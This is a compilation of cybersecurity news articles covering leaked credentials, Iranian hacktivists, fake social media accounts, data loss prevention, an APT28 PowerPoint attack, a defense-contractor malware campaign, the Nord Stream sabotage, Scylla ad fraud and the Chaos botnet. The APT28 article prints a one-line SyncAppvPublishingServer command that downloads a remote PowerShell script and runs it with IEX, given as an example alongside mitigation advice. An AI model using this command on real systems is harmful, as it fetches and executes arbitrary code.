Every year, billions of credentials appear online, be it on the dark web, clear web, paste sites, or in data dumps shared by cybercriminals. These credentials are often used for account takeover attacks, exposing organizations to breaches, ransomware, and data theft. 
While CISOs are aware of growing identity threats and have multiple tools in their arsenal to help reduce the potential risk, the

Every year, billions of credentials appear online, be it on the dark web, clear web, paste sites, or in data dumps shared by cybercriminals. These credentials are often used for account takeover attacks, exposing organizations to breaches, ransomware, and data theft.

While CISOs are aware of growing identity threats and have multiple tools in their arsenal to help reduce the potential risk, the reality is that existing methodologies have proven largely ineffective. According to the 2022 Verizon Data Breach Investigations Report, over 60% of breaches involve compromised credentials.

Attackers use techniques such as social engineering, brute force, and purchasing leaked credentials on the dark web to compromise legitimate identities and gain unauthorized access to victim organizations' systems and resources.

Adversaries often leverage the fact that some passwords are shared among different users, making it easier to breach multiple accounts in the same organization. Some employees reuse passwords. Others use a shared pattern in their passwords among various websites. An adversary can use cracking techniques and dictionary attacks to overcome password permutations by leveraging a shared pattern, even if the password is hashed. The main challenge to the organization is that hackers only need a single password match to break in.

To effectively mitigate their exposure, given current threat intelligence, organizations need to focus on what is exploitable from the adversary's perspective.

Here are five steps organizations should take to mitigate credentials exposure:

**Gather Leaked Credentials Data**

To start addressing the problem, security teams need to collect data on credentials that have been leaked externally in various places, from the open web to the dark web. This can give them an initial indication of the risk to their organization, as well as the individual credentials that need to be updated.

**Analyze the Data**

From there, security teams need to identify the credentials that could actually lead to security exposures. An attacker would take the username and password combinations (either cleartext or hashed), then try to use them to access services or systems. Security teams should use similar techniques to assess their risks. This includes:

*   Checking if the credentials allow access to the organization's externally exposed assets, such as web services and databases
*   Attempting to crack captured password hashes
*   Validating matches between leaked credential data and the organization's identity management tools, such as Active Directory
*   Manipulating the raw data to increase the achieved number of compromised identities. For example, users commonly use the same password patterns. Even if the leaked credentials do not allow access to external-facing assets or match Active Directory entries, it may be possible to find additional matches by testing variations.

**Mitigate Credential Exposures**

After validating the leaked credentials to identify actual exposures, organizations can take targeted action to mitigate the risk of an attacker doing the same. For instance, they could erase inactive leaked accounts in Active Directory or initiate password changes for active users.

**Reevaluate Security Processes**

After direct mitigation, security teams should evaluate whether their current processes are safe and make improvements where possible. For instance, if they are dealing with many matched leaked credentials, they may recommend changing the entire password policy across the organization. Similarly, if inactive users are found in Active Directory, it may be beneficial to revisit the employee offboarding process.

**Repeat Automatically**

Attackers are continuously adopting new techniques. Attack surfaces change, with new identities being added and removed on a routine basis. Similarly, humans will always be prone to accidental mistakes. As a result, a one-time effort to find, validate, and mitigate credential exposures is not enough. To achieve sustainable security in a highly dynamic threat landscape, organizations must continuously repeat this process.

However, resource-constrained security teams cannot afford to manually perform all these steps on a sufficient cadence. The only way to effectively manage the threat is to automate the validation process.

Pentera offers one way for organizations to automatically emulate attackers' techniques, attempting to exploit leaked credentials both externally and inside the network. To close the validation loop, Pentera provides insights into full attack paths, along with actionable remediation steps that allow organizations to efficiently maximize their identity strength.

To find out how Pentera can help you reduce your organization's risk of inadvertent credential exposure, contact us today to request a demo.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Five Steps to Mitigate the Risk of Credential Exposure

Several hacktivist groups are using Telegram and other tools to aid anti-government protests in Iran to bypass regime censorship restrictions amid ongoing unrest in the country following the death of Mahsa Amini in custody.
"Key activities are data leaking and selling, including officials' phone numbers and emails, and maps of sensitive locations," Israeli cybersecurity firm Check Point said in

Several hacktivist groups are using Telegram and other tools to aid anti-government protests in Iran to bypass regime censorship restrictions amid ongoing unrest in the country following the death of Mahsa Amini in custody.

"Key activities are data leaking and selling, including officials' phone numbers and emails, and maps of sensitive locations," Israeli cybersecurity firm Check Point said in a new report.

The company said it has also witnessed sharing of proxies and open VPN servers to get around censorship and reports on the internet status in the country, with one group helping the anti-government demonstrators access social media sites.

Chief among them is a Telegram channel called Official Atlas Intelligence Group (AIG) that's primarily focused on publishing data associated with government officials as well as maps of prominent locations.

Calling itself the "CyberArmy," the group is said to have commenced its operations in May and has also advertised a wide range of services in the past, such as data leaks, DDoS attacks, and remote access to organizations. It's also known to voluntarily hunt and dox pedophiles.

According to Cyberint, the cyber mercenary actor also claims to have "connections with people in several law enforcement entities in Europe who can deliver sensitive information about certain individuals exclusively."

A second group of interest is ARVIN, which consists of about 5,000 members and shares news reports about the ongoing protests along with providing a list of Open VPN servers to circumvent internet blockades.

RedBlue™, a 4,000-member group on Telegram, has also pitched in with similar efforts, in addition to sharing hacking conversations and guides.

Privacy-focused messaging app Signal, for its part, has reached out to its community to set up a proxy that will help people in the country use the service on Android.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Aid Protests Against Iranian Government with Proxies, Leaks and Hacks

Inflated user bases and fake engagement cause more harm than good, especially when the artificial accounts are based on stolen human identities.

Growth in the number of new accounts looks great, but if fake accounts get in that mix, they are not providing the value you (and your investors) need. If you are a social media platform striving for growth, fake accounts may seem like the answer to your prayers — something you can show investors to demonstrate your reach. And to the end user, all those accounts that listen to music online or follow us on social media seem great. But the reality is that fake accounts are harmful, even before the truth comes to light.

It's especially damaging when bots use real human data, stolen and sold on the Dark Web, to create these fake accounts. And when they are exposed to sunlight, as the situation with Elon Musk's stalled acquisition of Twitter has shown, the effects can be unexpected and rampant, quickly taking on a life of their own.

We're going to look at what fake accounts mean, why they exist, and what you can do to combat this pernicious adversary.

**Enter the Billionaire**

Love him or hate him, you cannot deny the impact Musk has made on the tech industry. But second-guessing his motives and actions is very much like my dog trying to work out the significance of my sitting at my desk drumming my fingers on the keyboard all day.

When I spoke with Tamer Hassan, co-founder and CEO of Human Security, I asked him what he believes is the core challenge facing any investor looking at Twitter. 

"It's really all about the question, 'What would you do if you could look like a million humans?' The answer is a lot," he said. "Cybercriminals have proliferated sophisticated bots and spam accounts across social media platforms with limited accountability, and the combined result is diminished trust in the brand, a negative user experience, and a negative impact on the company's valuation and bottom line."

**Twitter & the Tragedy of the Digital Commons**

Twitter is an increasingly rare Internet resource. It is a common platform connecting humans all over the world and, with some rare exceptions, does not inhibit or censor free expression. As with most common goods, it is subject to overuse; the phrase "tragedy of the commons" originated to describe people overusing grassy common land to graze their livestock. As anyone who has dipped a toe into the Twitter stream knows, the slew of tweets is overwhelming and impossible to keep up with. This is made worse because, along with all of the humans desperate to air their opinions, points of view, and excitable investment plans, there are The Bots.

Bots are part of much of our life nowadays. Those of us using Office365 are familiar with the coy daily email saying, _"__Hey, we aren't analyzing what you do or the content of your inbox_, _but here's some stuff to be aware of_,_"_ and of course, on Twitter there are beneficial bots and harmful bots. Many bots watch for tweets that seem to relate to a particular subject (for example, #cybersecurity), and then amplify those tweets to their audiences. And of course, many will try and game these amplifiers, sometimes using bots of their own. And so the overgrazing continues.

**No One Should Pay for False Volume, Even Billionaires**

The primary incoming revenue stream for social platforms is advertising, which is driven by how many interested eyes can be shown targeted ads that are likely to lead to conversion. It therefore follows that the value of any social platform lies in the number of active users, whether it be a general-purpose networking platform such as Twitter, a narrow-purpose use case such as music, or even accommodation rentals (inactive users are just sludge at the bottom of the well). Bots, while they may generate activity, defraud advertisers by artificially inflating the user count.

Musk is understandably squeamish about paying for accounts that have zero (or even negative) lifetime value. When I asked about what a company can do about bots, Hassan commented, "Having the right protections in place, including transparency and regulation around the use of automation, to ensure they have a genuine view of human users on their platform can help brands establish greater credibility while also stopping cybercriminals from impacting their business."

Musk very publicly tried to withdraw from the Twitter acquisition, which has generated continuing legal ramifications. If we take his statements at face value, then the clear message is that bots and other fake accounts are bad business. Considering the ways that future Twitter (or any social media platform) could make money, being a trustworthy source of curated identity that doctors, banks, governments, and any other interested party (including peer-to-peer) can rely on would be a significant advantage.

**Here's Mudge in Your Eye**

One of Musk's stated concerns about the Twitter acquisition is that he has no certainty about how many of the platform's 396.5 million accounts are human. To add fuel to Twitter's bonfire of the vanities, its former CISO, Peiter "Mudge" Zatko, has blown the whistle on poor operational security controls, nonexistent software governance, and (you guessed it) inadequate user enrollment verification. In other words, no one knows how many users are bots, and what vulnerabilities exist in the platform that can be exploited by unfriendly groups — some of which are backed by nation-states.

As a former Facebook security engineer pointed out to me, "Mudge has a decades-long reputation of being highly ethical and one of the most respected practitioners in the cybersecurity community." When I asked whether they believed Mudge's claims about foreign intelligence infiltration, the response was, "I believe enough of it not to care about the rest."

Robert Graham takes a different view in his Cybersect blog, which contrasts the focus of a cybersecurity activist with that of a corporate executive. An executive's primary objective is to further the interest of the company and its shareholders, he wrote, which does not correlate with the ideals of many cybersecurity activists. In his view, Mudge has allowed his passion for cybersecurity excellence to overwhelm his responsibilities as an executive.

**Identity as a Commodity**

Identity is the cornerstone of cybersecurity. When an identity is successfully compromised, all of the other security controls will fold up and get out of the attacker's way. The opportunity for Twitter to provide an identity service based on its user base is a significant one.

It is clear, however, that if we cannot trust that the identities being asserted and corroborated by Twitter are genuine, then Twitter's usefulness in this area will always be limited. Twitter asserts that the cost of validating every account (and giving us all a little blue tick) is prohibitive, however, as the lifetime value of each Twitter account is very low.

I'm sure that Twitter is well aware of its security gaps. Indeed, a good use for some of Musk's proposed investment, if the company can still get it, would be to clean up the town square and correct the tragedy of the digital commons that we discussed earlier.

This is why identity is important, in particular being able to prove that a specific account is being operated by a human. If we manage to turn Twitter into a place where free speech is valued precisely _because_ the speakers are identified as human, then its value — to investors, the Twitter team, and most importantly, its users — will skyrocket.

Fake Accounts Are Not Your Friends!

The average cost of a data-exposing cybersecurity incident is $4.35 million. If your business can’t avoid to pay, make sure you’ve got a strong data loss prevention practice in place.

$4.35 million. That's the average total cost of a data-exposing cybersecurity incident, according to the Ponemon Institute's "Cost of a Data Breach Report 2022." That's an all-time high, up 12.7% from 2020.

Between the potential loss of trade secrets, reputational harm, and regulatory fines related to data privacy, data breaches can threaten an organization's very existence. And if you don't take proactive measures to prevent them, the circumstances that led to one breach can easily result in another. Eighty-three percent of breached organizations report having suffered more than one such event.

Data loss prevention, or DLP, refers to a category of cybersecurity solutions that are specifically **designed to detect and prevent data breaches, leaks, and destruction**. These solutions do so by applying a combination of data flow controls and content analysis. And in today's cyber-threat landscape, DLP has become a basic business need.

**The Three States of Data and How DLP Protects Them**

There are **three main states** in which data can reside within an organization:

*   **Data in use**:**** Data is considered to be _in use_ when it's being accessed or transferred, either via local channels (e.g., peripherals and removable storage) or applications on the endpoint. An example could be files that are being transferred from a computer to an USB drive.
*   **Data in motion**:**** Data is considered to be _in motion_ when it's moving between computer systems. For example, data that is being transferred from local file storage to cloud storage, or from one endpoint computer to another via instant messenger or email.
*   **Data at rest**:**** Data is considered to be _at_ rest when it's stored, either locally or elsewhere on the network, and is not currently being accessed or transferred.

Of course, most sensitive data will change between these states frequently — in some cases, almost continuously — though there are use cases where data may remain in a single state for its entire life cycle at an endpoint.

Similarly, there are three primary "functional" DLP types, each dedicated to protecting one of these states of data. Here are just some examples of how this can work:

*   **Data-in-use DLP** systems may monitor and flag unauthorized interactions with sensitive data, such as attempts to print it, copy/paste to other locations, or capture screenshots.
*   **Data-in-motion DLP** detects whether an attempt is being made to transfer (confidential) data outside of the organization. Depending on your organization's needs, this can include _potentially_ unsafe destinations, such as USB drives or cloud-based applications.
*   **Data-at-rest DLP** enables a holistic view of the location of sensitive data on a local endpoint or network. This data can then be deleted (if it's out of place), or certain users' access to it blocked depending on your security policies.

Not all potential sources of a data breach are nefarious — they're often the result of good old-fashioned human error. Still, the impact is just as real whether sensitive information is intentionally stolen or simply misplaced.

**DLP Architecture Types**

DLP solutions can be categorized based on their architectural design:

*   **Endpoint DLP** solutions use endpoint-based DLP agents to prevent data in use, data in motion, and data at rest from leaking — regardless of whether they're used solely within a corporate network or exposed to the Internet.
*   **Network/cloud DLP** solutions use only network-resident components — such as hardware/virtual gateways — to protect data in motion or at rest.
*   **Hybrid DLP** solutions utilize both network- and endpoint-based DLP components to perform the functionality of both endpoint and network DLP architectures.

It's important to note that due to the nature of their architecture, network DLP solutions cannot effectively safeguard data in use: It remains vulnerable to purely local activities, like unauthorized printing and screen capturing.

**Adopting DLP Is More Important Than Ever**

The benefits of a strong DLP program are clear. By taking proactive steps to slash the risk of data loss and leakage, organizations can achieve some powerful benefits:

*   More easily achieving and maintaining compliance with relevant data privacy regulations, such as the GDPR and HIPAA
*   Protecting intellectual property and trade secrets
*   Strengthening security in an era of widespread remote work and BYOD policies
*   Minimizing the potential impact of human error and negligence

Larger enterprises may choose to adopt on-premises DLP solutions — and for some, this may be the right choice. But setting up a successful DLP program is complex and resource-intensive, and it requires fine-tuning over an extended period of time. Businesses will also need to bring aboard specialized experts with relevant experience. Those without such a team already in place will likely find it more efficient to work with a managed service provider (MSP) for their DLP needs.

In turn, MSPs are turning to partners to help them build out these Advanced DLP offerings to help prevent data leakage from clients' workloads.

Whether you manage your DLP in-house or turn to a vendor to help, it is a critical part of a modern, and future, security stack.

**About the Author**

    

Iliyan Gerov is a Senior Product Marketing Specialist at Acronis.

Plug Your Data Leaks: Integrating Data Loss Prevention into Your Security Stack

Categories: News
Tags: APT28

Tags:  Fancy Bear

Tags:  PowerPoint

Tags:  PowerShell

Tags:  One Drive

Tags:  SyncAppvPublishingServer

The Russian APT known as Fancy Bear was caught using an old mouseover technique that doesn't need macros



(Read more...)




The post APT28 attack uses old PowerPoint trick to download malware appeared first on Malwarebytes Labs.

Researchers at Cluster25 have published research about exploit code that's triggered when a user moves their mouse over a link in a booby-trapped PowerPoint presentation.

The code starts a PowerShell script that downloads and executes a dropper for Graphite malware.

Graphite is named after Microsoft's Graph API, which it uses to access command and control (C2) resources on Microsoft OneDrive. This type of communication allows the malware to avoid detection for longer, because it only connects to legitimate Microsoft domains.

The attack was attributed to the Russian APT28 group, also known as Sofacy or Fancy Bear, a notorious Russian threat actor that has been active since at least 2004. Its main activity is collecting intelligence for the Russian government. The group is known to have targeted US politicians, organizations, and even nuclear facilities.

Cluster25 indicates that entities and individuals in the defense and government sectors of European countries may have been the potential targets of this campaign. But, as we always say, attribution is hard, and thinking you aren't a target isn't a good defense strategy.

**Malicious mouseover**

The technique used in this attack does not require macros to be enabled. It uses the Windows native SyncAppvPublishingServer utility, which is triggered by simply hovering over a hyperlink.

Basically, hovering over a mouse can be used to trigger:

SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://example.org/malice.ps1') | IEX"

Which downloads a script—malice.ps1 in my example—which can be used to execute malicious code on the affected system.

In the example discovered by Cluster25, the malicious link triggered a PowerShell script that downloaded a DLL file from OneDrive, disguised with a .jpeg extension. The file was later decrypted and written to the local path C:\ProgramData\lmapi2.dll. The script also added a registry key to execute the DLL via rundll32.exe for persistence.

The victim does not need administrator access to trigger a successful attack. This technique is by no means new—it was spotted spreading malware five years ago, in 2017.

**Mitigation**

SyncAppvPublishingServer has no business running unless the Application Virtualization (App-V) for Windows client is active on the system. App-V delivers Win32 applications to users as virtual applications, which are installed on centrally managed servers and delivered as a service in real time, on an as-needed basis. Users launch and interact with virtual applications as if they are installed locally.

So, unless you are using this functionality, it is safe to block SyncAppvPublishingServer.exe. Also, Microsoft Office's Protected View should stop the code from executing. Protected View is enabled by default and should not be disabled. You can check this by opening an Office file and clicking on **File > Options,** then **Trust Center > Trust Center Settings > Protected View** to view the active settings.

**Malwarebytes**

Malwarebytes users are protected against this attack.

Our web protection module blocks the One Drive URLs and our Real-time Protection module detects lmapi2.dll as Trojan.Downloader.

APT28 attack uses old PowerPoint trick to download malware

Malware used in the STEEP#MAVERICK campaign features rarely seen obfuscation, anti-analysis, and evasion capabilities.

A cyberattack campaign, potentially bent on cyber espionage, is highlighting the increasingly sophisticated nature of cyberthreats targeting defense contractors in the US and elsewhere.

The covert campaign, which researchers at Securonix detected and are tracking as STEEP#MAVERICK, has hit multiple weapons contractors in Europe in recent months, including potentially a supplier to the US F-35 Lightning II fighter aircraft program.

What makes the campaign noteworthy according to the security vendor is the overall attention the attacker has paid to operations security (OpSec) and to ensuring their malware is hard to detect, difficult to remove, and challenging to analyze. 

The PowerShell-based malware stager used in the attacks have "featured an array of interesting tactics, persistence methodology, counter-forensics and layers upon layers of obfuscation to hide its code," Securonix said in a report this week.

**Uncommon Malware Capabilities**

The STEEP#MAVERICK campaign appears to have launched in late summer with attacks on two high-profile defense contractors in Europe. Like many campaigns, the attack chain began with a spear-phishing email that contained a compressed (.zip) fie with a shortcut (.lnk) file to a PDF document purportedly describing company benefits. Securonix described the phishing email as being similar to one it had encountered in a campaign earlier this year involving North Korea's APT37 (aka Konni) threat group.

When the .lnk file is executed, it triggers what Securonix described as a "rather large and robust chain of stagers," each written in PowerShell and featuring as many as eight obfuscation layers. The malware also features extensive anti-forensic and counter-debugging capabilities which include monitoring a long list of processes that could be uses to look for malicious behavior. The malware is designed to disable logging and bypass Windows Defender. It uses several techniques to persist on a system, including by embedding itself in the system registry, by embedding itself as a scheduled task and by creating a startup shortcut on the system.

A spokesperson with Securonix's Threat Research Team says the number and variety of anti-analysis and anti-monitoring checks the malware has is unusual. So, too, is the large number of obfuscation layers for payloads and the malware's attempts to substitute or generate new custom command-and-control (C2) stager payloads in response to analysis attempts: "Some obfuscation techniques, such as using PowerShell get-alias to perform \[the invoke-expression cmdlet\] are very rarely seen."

The malicious activities were performed in an OpSec-aware manner with different types of anti-analysis checks and evasion attempts throughout the attack, at a relatively high operational tempo with custom payloads injected. 

"Based on the details of the attack, one takeaway for other organizations is paying extra attention to monitoring your security tools," the spokesperson says. "Organizations should ensure security tools work as expected and avoid relying on a single security tool or technology to detect threats."

**A Growing Cyber Threat**

The STEEP#MAVERICK campaign is only the latest in a growing number that have targeted defense contractors and suppliers in recent years. Many of these campaigns have involved state-backed actors operating out of China, Russia, North Korea, and other countries. 

In January, for instance, the US Cybersecurity and Infrastructure Security Agency (CISA) issued an alert warning of Russian state-sponsored actors targeting so-called cleared defense contractors (CDCs) in attacks designed to steal sensitive US defense information and technology. The CISA alert described the attacks as targeting a wide swath of CDCs, including those involved in developing combat systems, intelligence and surveillance technologies, weapons and missile development, and combat vehicle and aircraft design.

In February, researchers at Palo Alto Networks reported on at least four US defense contractors being targeted in a campaign to distribute a fileless, socketless backdoor called SockDetour. The attacks were part of a broader campaign that the security vendor had investigated along with the National Security Agency in 2021 involving a Chinese advanced persistent group that targeted defense contractors and organizations in multiple other sectors.

**Defense Contractors: A Vulnerable Segment**

Adding to the concerns over the rising volume of cyberattacks is the relative vulnerability of many defense contractors, despite having secrets that should be closely guarded. 

Recent research that Black Kite conducted into the security practices of the top 100 US defense contractors showed that nearly a third (32%) are vulnerable to ransomware attacks. This is because of factors like leaked or compromised credentials, and weak practices in areas such as credential management, application security and Security Sockets Layer/Transport Layer Security. 

Seventy-two percent of the respondents in the Black Kite report have experienced at least one incident involving a leaked credential.

There could be light at the end of the tunnel: The US Department of Defense, in conjunction with industry stakeholders, has developed a set of cybersecurity best practices for military contractors to use to protect sensitive data. Under the DoD's Cybersecurity Maturity Model Certification program, defense contractors are required to implement these practices — and get certified as having them — to be able to sell to government. The bad news? The rollout of the program has been delayed.

Sophisticated Covert Cyberattack Campaign Targets Military Contractors

Damage to the pipeline that runs between Russia and Germany is being treated as deliberate. Finding out what happened may not be straightforward.

The Nord Stream gas pipelines are colossal pieces of infrastructure. Running more than 1,200 kilometers from Russia, across the Baltic Sea to Germany, the pipes can carry up to 110 billion cubic meters of gas, enough for 26 million homes. The Nord Stream 1 pipeline alone is constructed of 202,000 huge pieces of piping. Each section is 12 meters long and contains piping that uses around 4 centimeters of steel, which is covered with 11 centimeters of concrete. The pipes are not built to break.

So when the pressure in one of the Nord Stream pipes dropped on June 26, alarm bells started ringing. Danish authorities told ships to steer clear of the pipes as methane gas was bubbling into the sea. Hours later, two more leaks were detected, one in Nord Stream 2 and a second in Nord Stream 1. Now, authorities are suspecting foul play. “We are not talking about an accident,” Mette Frederiksen, the Danish prime minister said.

Ursula von der Leyen, head of the European Commission, believes the leaks may be a result of “sabotage” and said any “deliberate disruption” of energy infrastructure will “lead to the strongest possible response.” NATO officials agree; the US has pledged its support to help Europe find out what happened. However, the incidents have raised fears about attacks on critical infrastructure and the security protections in place around systems that can provide the world’s fuel. The incident comes on top of Russia reducing its supply of gas to Europe, with large parts of the continent facing winter energy crises.

While officials have indicated the leaks may have been caused deliberately, very little evidence about the attacks has emerged so far. Military flights over the region show gas bubbling at the surface more than a kilometer wide, and Swedish seismic experts say they are convinced explosions took place after they recorded tremors equal to a magnitude 2.3 earthquake.

Fingers immediately pointed at Russia, which partly owns the pipes. Ukraine has said it is a “terrorist attack,” and German newspaper _Der Spiegel_ reported that the CIA warned German officials about possible attacks against Baltic pipelines several weeks ago. (Right-wing commentators in the US and one Polish MP accused the US of being involved after President Joe Biden said, in February, he would “put an end” to Nord Stream 2 if Russia invaded Ukraine.)

"It's a very classic Russian hybrid warfare approach,” says Hans Tino Hansen, the CEO of Risk Intelligence, a Denmark-based security firm that deals with maritime issues. Hansen says if Russia did attack the Nord Stream pipelines it would show they have “complete deniability.” Because Russia partly owns the Nord Stream infrastructure, it makes people question why it would be behind any attacks against it. (The Kremlin claimed suggestions it is behind the leaks are “stupid.) “They are showing that they can attack seabed energy infrastructure, with the pipelines, which then sends the signal that they can attack and destroy any energy infrastructure in Europe," Hansen says.

Investigators across Europe, including intelligence agencies, will now be trying to piece together exactly who and what caused the apparent explosions. This is likely to involve multiple steps, such as examining what data is held about the area, including seismic data and other sensors, checking whether any communications around the incident have been intercepted, and examining the pipelines to see if there are any signs of intentional destruction.

Neither of the pipes is operational—Nord Stream 1 was paused for repairs in August and Nord Stream 2 has not officially opened after Germany pulled support for it ahead of Russia’s full-scale invasion of Ukraine in late February—but both pipes are holding gas. All three leaks happened relatively close to each other, near the Danish island of Bornholm, in the Baltic sea. The island is surrounded by Denmark to the west, Sweden to the north, and both Germany and Poland to the south. The leaks are in international waters, but also sit in both Denmark and Sweden’s exclusive economic zones. “It's quite shallow, around 50 meters on average in this region,” says Julian Pawlak, a research associate at the Helmut Schmidt University and the German Institute for Defence and Strategic Studies.

Security sources have speculated if the attacks were deliberate, they could have been conducted by unmanned underwater drones, involve mines being dropped or planted by boats, been carried out by divers, or even from within the pipes themselves. “We still don't know what the origin is of those explosions or where they came from—if they originated from the outside or if they originated from the inside of the pipelines,” Pawlak says. In a process called “pigging,” cleaning and inspection machines can be sent down the pipes from Russia in the direction of Germany. It’s possible pigging was repurposed to carry out an attack.

Back in 2007, before the first Nord Stream pipeline was constructed, a review of the project by the Swedish Defence Research Agency (FOI) warned about potential explosions around the pipe, in the context of terrorism. “Despite its concrete coating, a pipeline is rather vulnerable, and one diver would be enough to set an explosive device,” its report said. “However, the impact of such an assault would probably be rather modest and most likely a minor incident of this type would not result in a large explosion.”

"They \[Russia\] have the capability for subsea warfare, with the divers, but also with mini-submarines and drones,” Hansen says. However, confirming any responsibility isn’t necessarily straightforward. The relatively shallow depth of the area around the Nord Stream pipes means it is unlikely that any large submarines would have been operating nearby, as they would be easy to detect.

Pawlak says any vessels in the area could potentially detect others that may have caused the damage. Undersea sensors could equally spot something in the area moving, but it is unclear where any of these systems are. “It's still not the case that all of the Baltic Sea is filled up with sensors and that NATO knows every movement,” Pawlak says. “On the surface, but especially on the seabed, it's still not possible to know, at every time, at every place, what's moving, what's going on.”

However, the Nord Stream incidents draw into focus the protections that are placed around critical infrastructure. In recent years, cyberattacks have shut down the US Colonial Pipeline, cutting off fuel supplies. And ahead of Russia’s full-scale invasion of Ukraine, its military hackers used the country as a cyberwarfare testing ground, shutting down power grids with their code.

Undersea infrastructure can be particularly vulnerable to damage—either from natural causes, such as earthquakes, or physical attacks. Since the Nord Stream pipes burst on Tuesday huge volumes of gas have poured into the sea, potentially causing an “unprecedented” environmental impact. "As we—and many others—have been saying for many years, we need to address the security of energy infrastructure and also everything subsea,” Hansen says. This includes the myriad of internet cables stretching thousands of kilometers around the world and keeping billions of people online.

In January, the head of the UK’s armed forces warned that Russian submarines have been threatening subsea cables. “Russia has grown the capability to put at threat those undersea cables and potentially exploit those undersea cables,” Admiral Tony Radakin said.

Hansen says there are two starting points for protecting subsea infrastructure: first, building out ways to detect faults and issues with equipment automatically and then also making sure there is equipment, such as underwater drones, that are able to scramble to sites to inspect them when damage has happened. Those steps may already be underway, with Norway’s prime minister saying the country will up the military protection of its energy infrastructure.

The Race to Find the Nord Stream Saboteurs

By Waqas
Before being removed, the Scylla ad fraud campaign used over 90 malicious apps to carry out its operation against Android and iOS users.
This is a post from HackRead.com Read the original post: Scylla Ad Fraud Attack on iOS and Android Users Halted by Apple and Google

The Satori Threat Intelligence and Research Team at Human identified a new wave of cyberattacks involving the use of malicious applications against iOS and Android users. The alarming fact is that these infected apps boast millions of downloads.

The good news is that the attack has been halted by Apple and Google after their prompt response to the researchers.

**Malicious Apps Found on Legitimate Platforms**

Reportedly, 89 malicious apps were discovered and used in a mobile fraud ad campaign. The apps collectively boasted around 13 million downloads. The researchers have dubbed this campaign Scylla.

Per their research, this campaign is the third installment of the Poseidon fraud campaign discovered in 2019, and its second installment was named Charybdis, which was detected in 2020.

You may be wondering where have you heard the term Scylla and Charybdis before. “Being between Scylla and Charybdis” is an idiom deriving from Greek mythology, which has been associated with the proverbial advice “to choose the lesser of two evils”.

In Greek mythology, Scylla and Charybdis were two monsters who lived on either side of a narrow channel of water. Scylla was a six-headed monster (_also featured in the TV series Prison Break_) who lived on a rock in the middle of the channel. Charybdis was a whirlpool who lived on the other side of the channel.

As for the malicious campaign, out of these 89 apps, 89 are Android, and 9 are iOS-based apps. The malicious apps perform ad fraud via hidden apps, spoofing, and fake clicks. What makes Scylla different from the earlier two mobile fraud campaigns is that this time the attackers have found a way to target iOS devices too.

**More Android Malware News**

1.  New malware targeting IoT devices, Android TV globally
2.  LG Smart TV Screen Bricked in Android Ransomware Attack
3.  Top 10 Android Educational Apps That Collect Most User Data?
4.  Fake Banking Rewards Apps Install Malware on Android Phones
5.  Hacked Android phones mimicked TV products for fake ad views

**Campaign Analysis**

According to the company’s blog post, just like the Charybdis campaign, the apps used in Scylla also contained obfuscated code. The attack mechanism is also somewhat the same as the apps target advertising software development kits/SDKs.

One of the iOS apps called “Wood Sculptor,” linked to the Scylla ad fraud campaign (Source: Satori Threat Intelligence and Research Team)

It is worth noting that some apps contained code that posed as completely different when observed by advertisers and ad tech firms.

> “These tactics, combined with the obfuscation techniques first observed in the Charybdis operation, demonstrate the increased sophistication of the threat actors behind Scylla.”
> 
> Satori Threat Intelligence and Research Team

**Application Detailed Overview**

Human researchers detected 29 Android apps posed as more than six thousand CTV-based apps to encourage higher ad proceeds than mobile games. Conversely, some apps contained code that informed advertisers of the ads they displayed to the user.

This means the code rendered ads after the apps were closed, such as when the home screen was on. Some apps captured the information about what ads the user clicked on and transferred the info to advertisers as a fake click. Most of the malicious apps were games.

Google and Apple were promptly informed about malicious apps’ presence and quickly removed from their respective platforms. Advertising SDK developers were also informed about the attack.

Human also published a list of malicious apps and urged users to remove them if installed on their devices. To remove these apps, just tap and hold the App and tap on the Remove option. Then tap on Delete App.

**More iOS Malware News**

1.  SolarWinds hackers exploited iOS 0-day to hack iPhones
2.  Malicious SDK spying, defrauding users through iOS apps
3.  Facebook removes accounts for iOS, and Android malware
4.  Fake Covid-19 apps hit Android and iOS users with spyware
5.  Install Malware on iPhone When it is Powered Off – Research

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Scylla Ad Fraud Attack on iOS and Android Users Halted by Apple and Google

The previously identified ransomware builder has veered in an entirely new direction, targeting consumers and business of all sizes by exploiting known CVEs through brute-forced and/or stolen SSH keys.

The powerful Chaos malware has evolved yet again, morphing into a new Go-based, multiplatform threat that bears no resemblance to its previous ransomware iteration. It's now targeting known security vulnerabilities to launch distributed denial-of-service (DDoS) attacks and perform cryptomining.

Researchers from Black Lotus Labs, the threat intelligence arm of Lumen Technologies, recently observed a version of Chaos written in Chinese, leveraging China-based infrastructure, and exhibiting behavior far different than the last activity seen by the ransomware-builder of the same name, they said in a blog post published Sept. 28.

Indeed, the distinctions between earlier variants of Chaos and the 100 distinct and recent Chaos clusters that researchers observed are so different that they say it poses a brand-new threat. In fact, researchers believe the latest variant is actually the evolution of the DDoS botnet Kaiji and perhaps "distinct from the Chaos ransomware builder" previously seen in the wild, they said.

Kaiji, discovered in 2020, originally targeted Linux-based AMD and i386 servers by leveraging SSH brute-forcing to infect new bots and then launch DDoS attacks. Chaos has evolved Kaiji's original capabilities to include modules for new architectures — including Windows — as well as adding new propagation modules through CVE exploitation and SSH key harvesting, the researchers said.

**Recent Chaos Activity**

In recent activity, Chaos successfully compromised a GitLab server and unfurled a flurry of DDoS attacks targeting the gaming, financial services and technology, and media and entertainment industries, along with DDoS-as-a-service providers and a cryptocurrency exchange.

Chaos is now targeting not only enterprise and large organizations but also "devices and systems that aren't routinely monitored as part of an enterprise security model, such as SOHO routers and FreeBSD OS," the researchers said.

And while the last time Chaos was spotted in the wild it was acting more as typical ransomware that entered networks with the purpose of encrypting files, the actors behind the latest variant have very different motives in mind, the researchers said.

Its cross-platform and device functionality as well as the stealth profile of the network infrastructure behind the latest Chaos activity appears to demonstrate that the aim of the campaign is to cultivate a network of infected devices to leverage for initial access, DDoS attacks, and cryptomining, according to the researchers.

**Key Differences, and One Similarity**

While previous samples of Chaos were written in .NET, the latest malware is written in Go, which is rapidly becoming a language of choice for threat actors due to its cross-platform flexibility, low antivirus detection rates, and difficulty to reverse-engineer, the researchers said.

And indeed, one of the reasons that the latest version of Chaos is so powerful is because it operates across multiple platforms, including not only Windows and Linux operating systems but also ARM, Intel (i386), MIPS, and PowerPC, they said.

